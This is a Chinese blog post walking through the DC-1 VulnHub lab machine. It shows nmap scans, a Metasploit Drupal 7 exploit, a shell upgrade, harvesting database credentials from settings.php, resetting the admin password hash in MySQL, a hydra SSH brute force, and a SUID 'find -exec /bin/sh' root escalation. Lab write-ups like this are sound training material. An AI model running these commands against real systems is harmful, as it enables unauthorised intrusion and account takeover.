【DC系列】DC-1靶场

最新推荐文章于 2023-05-29 23:21:32 发布
最新推荐文章于 2023-05-29 23:21:32 发布
阅读量856 收藏 3
点赞数 2
文章标签: linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51611948/article/details/128901338
版权

首先下载DC1的镜像资源:Index of /downloadsicon-default.png?t=N0U7https://www.five86.com/downloads/

下载完成后进行解压,鼠标右击DC-1镜像->打开方式->选择虚拟机。

如下图所示:

输入虚拟机名称和选择虚拟机的存储路径后点击导入。

当出现以下报错信息时直接点击重试即可:

 导入成功后,鼠标右击DC-1虚拟机->设置->网络适配器->nat模式->确定:(虚拟机kali最好也选择nat模式,保证双方在同一网段上)

然后点击开启虚拟机,如果出现报错,点击否即可,

如果出现如下画面则表示启动成功:

 到这里环境就搭建完成了,下面进行渗透测试:
1.信息收集

查看DC1虚拟机的Mac地址:鼠标右击DC-1虚拟机->设置->网络适配器->高级。

打开虚拟机kali->启动终端:

主机发现:nmap -sn 192.168.17.0/24   //注意:此处为你nat模式下的ip网段

得到DC-1的ip地址为:192.168.17.166

nmap -A -p- 192.168.17.166

(-A:使用高级功能进行扫描,即全面扫描;-p-:扫描端口号1-65535,与-p 1-65535相同意思)

通过扫描结果可知端口22,80,111,39206端口是开放的。 

在物理机的火狐浏览器访问192.168.17.166:

通过火狐浏览器的Wappalyzer插件知道网站的CMS是Drupal 7,编程语言是PHP 5.4.45;

利用搜索引擎查找有关Drupal 7的漏洞:inurl:Drupal 7漏洞

 知道该CMS存在漏洞,就轮到美少妇(msf)出场了。

2.漏洞利用

 在kali终端启动msf:msfconsole

查找有关Drupal 7的漏洞:search Drupal 7.x

存在利用模块:use 0 

显示选项:show options

设置远程目标主机的ip:set  rhosts 192.168.17.166   //DC-1的ip地址

开始利用:run或exploit都可以

显示下图则利用成功:

获取普通shell:shell

进入交互式shell:python -c 'import pty; pty.spawn("/bin/bash")'

 列出目录中的文件及子目录的名称:dir

发现flag1.txt,查看该文件:cat flag1.txt

提示寻找CMS的配置文件,利用百度进行搜索:inurl:Drupal 配置文件

 查找settings.php文件:

 find -name 'settings.php'

查看该文件:

cat ./sites/default/settings.php

可以看到flag2和数据库的相关信息(数据库名称:drupaldb,用户名:dbuser,密码:R0ck3t) 

尝试连接数据库:mysql -udbuser -pR0ck3t(-u后给出用户名,-p后给出密码)

使用drupaldb数据库:use drupaldb;

查看数据库的所有表名: show tables;

 发现两个有关users的表:

 

查看users表:select * from users;
发现密码被加密过: 

先退出mysql,查找加密文件:

exit;

找到Drupal的加密脚本:

/var/www/scripts/password-hash.sh

查看该文件,发现是用php语言编写:

可利用php + 加密脚本 + 密码得到加密后的密码:

php /var/www/scripts/password-hash.sh 123456

复制加密后的密码,再次进入数据库,然后将users表admin用户的密码更改为自己加密后的密码:

 update users set pass = "$S$DOp8U3lzGVGwxESLWgcjgnQdtr8DBkUFyz2sJTq12uTAbJKIpk3n" where name = "admin";

然后使用admin:123456(用户名:admin,密码:123456)登录网站:http://192.168.17.166

登录成功后点击Content->flag3。

 提示获取shadow中的内容,看到shadow,又因为DC-1是linux系统,想到的就是/etc/shadow文件。

尝试查看/etc/shadow文件,访问被拒绝, 应该是权限不够。

知识点:

/etc/passwd:存储系统用户的基本信息,所有用户都可以访问

/etc/shadow:存储系统用户的密码等信息,只有root权限才可以访问。

查看/etc/passwd文件,发现有关flag4的信息:

想到利用nmap扫描出来的22端口,开启的是ssh服务,有可能flag4就是ssh的用户名,尝试爆破密码:(启动另外一个kali终端,使用hydra工具进行爆破)

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz 192.168.17.166 ssh

-l:指定用户名

-P:指定爆破的密码字典

 成功爆破出密码后进行ssh连接:(ssh 用户名@开启了ssh服务的ip地址),输入爆破出来的密码

连接成功后查看当前文件内容:ls

发现flag4.txt,查看该文件:cat flag4

提示使用相同的方法查找或访问根目录中的flag,应该是要进行提权:

这里利用suid进行提权,

查看具有root用户权限的SUID文件:

find / -perm -u=s -type f 2>/dev/null

find / -name index.php -exec "/bin/sh" \;

 成功提权后进入到root目录下,发现最后的flag。

本人第一次写博客,还存在很多问题,各位读者在阅读时若有疑问可在评论区留言。 

每天进步一点点30
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6680
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场搭建及渗透实战详细过程(DC靶场系列
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC靶场系列--DC1
BGiscool的博客
06-28 4461
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1125
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
靶场系列DC-1.md
07-26
靶场系列DC-1.md
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC5-目录传参爆破字典
最新发布
12-18
DC5主机靶场文件包含漏洞的数据包传参的函数字典
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2576
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC-9靶场下载及渗透实战详细过程(DC靶场系列
金 帛的博客
08-09 4034
dc-9靶场详细渗透过程
DC-1靶场
xhx836161547的博客
12-15 279
DC-1靶场练习报告
DC系列DC-2靶场
qq_51611948的博客
02-14 1006
详细介绍DC2靶机渗透全过程
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1122
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1 靶场学习
akxnxbshai的博客
02-24 670
练习一下工具使用
DC-3靶场搭建及渗透实战详细过程(DC靶场系列
金 帛的博客
07-27 4806
DC-3靶场渗透过程
DC-1靶场渗透实验
Alashan12的博客
05-05 1819
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
在centos7拉取vulhub靶场镜像
weixin_44953697的博客
05-29 280
使用vulhub靶场要有docker,使用docker来启动vulhub靶场,安装docker前确保已配置国内镜像站避免安装失败。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值